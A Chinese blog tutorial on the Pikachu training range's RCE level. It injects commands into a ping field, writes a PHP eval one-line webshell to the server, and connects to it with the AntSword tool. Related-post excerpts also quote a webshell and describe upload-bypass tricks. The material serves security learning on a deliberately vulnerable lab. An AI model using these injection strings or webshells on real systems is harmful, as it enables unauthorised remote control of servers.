pikachu靶场 利用Rce上传一句话木马案例(工具:中国蚁剑)

于 2024-06-30 09:06:33 发布
阅读量693 收藏 8
点赞数 8
分类专栏: ctf 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46745664/article/details/140075729
版权

目录

一、准备靶场,进入RCE

二、测试写入文件

三、使用中国蚁剑

一、准备靶场,进入RCE

我这里用的是pikachu

打开pikachu靶场,选择 RCE > exec "ping"

 测试是否存在 Rce 漏洞

因为我们猜测在这个 ping 功能是直接调用系统的 ping 命令,如:

ping (输入框的内容)

那我们就可以利用这个构造恶意指令,

当我们的输入框内填入 “localhost | ipconfig”时,执行的指令为:

ping localhost | ipconfig

可是经过测试发现并没有回显,执行后并无反应

二、测试写入文件

我们尝试写入文件:

当我们的输入框内填入 “localhost | echo 999>2.php”时,执行的指令为:

ping localhost | echo 999>2.php

点击ping,此时界面还是只刷新了一下,并没有明显反应。

我们查看一下是否写入成功,访问http://你的ip:你的端口/vul/rce/2.php

很明显写入成功,那我们尝试写入我们的一句话木马:

Windows和Linux下写入一句话PHP木马echo命令总结

当我们的输入框内填入 “localhost | echo '<?php eval($_REQUEST[74])?>' >s.php”(中括号内的74可以换成你的密码)时,执行的指令为:

ping localhost | echo '<?php eval($_REQUEST[74])?>' >s.php

访问http://你的ip:你的端口/vul/rce/s.php,发现一片空白,说明写入成功。因为如果服务器没文件应该会报“/vul/rce/s1.php was not found

三、使用中国蚁剑

打开中国蚁剑,右键添加数据:

输入一句话木马的url:

拿下:

Mr.Pascal
关注
  • 8
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web安全中国蚁剑+DVWA(本地文件上传漏洞Upload)
李响
03-22 2214
文章目录1 中国蚁剑2 文件上传漏洞(Upload)2.1 准备hack.php2.2 从DVWA上传hack.php3 使用蚁剑来连接获得webshell 1 中国蚁剑 中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 数据配置管理 虚拟终端操作 文件管理 数据库管理 ...
Pikachu靶场RCE漏洞详解
m0_46467017的博客
05-18 6173
Pikachu靶场RCE漏洞详解漏洞简述诚意推荐靶场闯关第1关 exec “ping”源码分析:第2关 exec "eval"源码分析 漏洞简述 一、什么是RCERCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 1、远程系统命令执行 出现原因:因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。 比如常见的路由器、防火墙、入侵检测等设备的web管理界面上,一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地
pikachu靶场(命令执行(RCE)通关教程)
最新发布
记录学习
06-13 192
pikachu靶场RCE通关教程
Pikachu靶场-RCE远程命令/代码执行漏洞~保姆级教程!!!
2301_77360738的博客
05-16 377
全网最最最详细的Pikachu靶场远程命令/代码执行漏洞,看完包会,小白可入!!!
pikachu靶场&RCE&文件包含&上传下载&越权(四)
weixin_41665162的博客
08-05 1000
文章目录RCE概述RCE-PINGRCE-EVELFile Inclusion(文件包含漏洞)概述文件下载漏洞概念文件上传漏洞概述前端页面检查(client check)MIME TYPE漏洞getimagesizeover permission 概述水平越权垂直越权 RCE 概述 RCE(remote command/code execute)漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定
pikachu——暴力破解、文件上传
qq_66985187的博客
10-24 278
暴力破解 “暴力破解”是一种攻击手段,在web攻击中,一般会使用这种手段对应用系统的认证信息进行获取。 其过程就是使用大量的认证信息在认证接口进行尝试登录,直到得到正确的结果。 为了提高效率,暴力破解一般会使用带有字典的工具来进行自动化操作。 我们说一个web应用系统存在暴力破解漏洞,一般是指该web应用系统没有采用或者采用了比较弱的认证安全策略,导致其被暴力破解的“可能性”变的比较高。这里的认证安全策略, 包括: 是否要求用户设置复杂的密码; 是否每次认证都使用安全的验证码或者手机otp; 是否
PiKachu靶场RCE(远程系统命令执行)
angry_program的博客
02-21 6705
概述 RCE(remote command/code execute)漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交...
蚁剑与一句话木马
m0_55771794的博客
07-15 5937
目录 一句话木马 一个关于php的例子 入侵条件 蚁剑的下载与安装 在安装的时候注意 真题实践 一句话木马 先来说说一句话木马是什么东西 一句话木马,又简称(webshell),在很多渗透测试时,渗透人员会上传一句话木马到目前web服务目录继而提权获取系统权限。 举一个关于php的例子 <?php @eval($_POST['syc']);?> 它的原理呢,是利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以通过中国菜刀即可获取和控制整个网站目录。 ..
D6 pikachu SQL Iuject(updatexml() extractvalue() floor() 盲注 based boolean baesd time 一句话木马 暴力破解)
m0_60071324的博客
08-02 628
目录 首先 select a,b from c where id=1 xxx' or 1=1#' xxxx%' or 1=1# ' 可以检测是否可以sql注入 a 'union select database(),user()## 通过union查询信息 a' order by 3#查看第三行 看到底有没有这些数据 updatexml()extractvalue()floor() 盲注 一句话木马 暴力破解 首先 很早就接触了SQL注入 对它还是买油兴趣的 一定要自己有兴趣..
中国蚁剑安装教程——antsword及webshell一句话木马
qq_53099802的博客
04-22 7344
antsword与php一话木马
DVWA-文件上传全等级绕过(一句话木马+中国菜刀+蚁剑)
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
12-13 1万+
DVWA文件上传前言一、low级别1.1 一句话木马1.2 中国菜刀使用1.3 蚁剑二、Medium级别三、High级别四、Impossible级别 前言     文件上传漏洞是对于上传文件的类型内容没有进行严格的过滤检查,使得攻击者可以通过上传一些木马获取服务器的webshell,因此文件上传漏洞带来的危害通常都是致命的。 一、low级别 打开dvwa,File Upload     会看到有红色报错,具体解决办法请参考我的
web渗透教程1:pikachu靶场搭建
11-17
带你手把手搭建pikachu靶场环境
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
pikachu靶场环境
02-12
"pikachu靶场环境" 是一个专门为网络安全学习和实践设计的平台,它为用户提供了一个安全的、受控的环境来模拟真实的网络攻击与防御场景。在这个环境中,参与者可以学习和提升自己的渗透测试技巧,同时了解如何加固...
pikachu靶场全通关教程
07-20
这个是刚开始学网络安全渗透的靶场练习心得,分享给大家
pikachu靶场SQL注入.docx
09-13
Pikachu靶场SQL注入是针对Web应用程序的一种攻击手段,通过对Web应用程序的输入参数进行tampering,来达到访问数据库的目的。下面是Pikachu靶场SQL注入的详细知识点: 一、数字型注入(POST) 数字型注入是指在Web...
中国蚁剑(AntSword)安装、使用教程
热门推荐
凝聚力安全团队
08-24 9万+
项目地址 加载器: https://github.com/eastmountyxz/AntSword-Experiment/ 项目核心源码: https://github.com/yuyuko233/AntSword 如果从github上下载很卡,可以去复制链接到githubd上下载 https://githubd.com 安装教程 我使用的渗透机为windows10,下载好会包含两个文件: 使用教程 插件安装 ...
文件上传漏洞绕过技巧
abtgu的博客
03-31 1276
文章目录一、文件上传漏洞介绍二、验证方法与绕过1.1CONTENT-LENGTH验证1.2CONTENT-LENGTH绕过2.1客户端javascript 检测(通常为检测文件扩展名)2.1客户端javascript3. 服务端MIME 类型检测(检测Content-Type 内容)4.分析文件头内容来检查文件类型5.文件加载检测6.限制Web Server对于特定类型文件的行为三、反制 一、文件...
RCE/文件包含/文件上传基本利用手法
actistsec的博客
10-22 1145
记录RCE/文件上传/文件包含的几种利用
pikachu靶场rce
09-07
Pikachu靶场中的RCE指的是远程命令/代码执行漏洞。该漏洞存在于Pikachu靶场的第1关和第2关中。在第1关中,通过对"exec "ping""命令的源码分析可以了解到该漏洞的详细信息。在代码中,将用户输入的IP地址赋值给变量$ip,并直接将其传入shell_exec()函数执行,导致命令可被拼接并执行。 在第2关的"exec "eval""中也存在远程命令/代码执行漏洞。具体源码分析未提供,但可以推测该漏洞的原理类似于第1关中的RCE漏洞。 总之,Pikachu靶场中的RCE漏洞给黑客提供了可以远程执行任意命令或代码的机会,这对Web应用系统的安全性构成了严重威胁。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [Pikachu靶场RCE漏洞详解](https://blog.csdn.net/m0_46467017/article/details/124838779)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [pikachu.rar](https://download.csdn.net/download/weixin_45663905/12742070)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值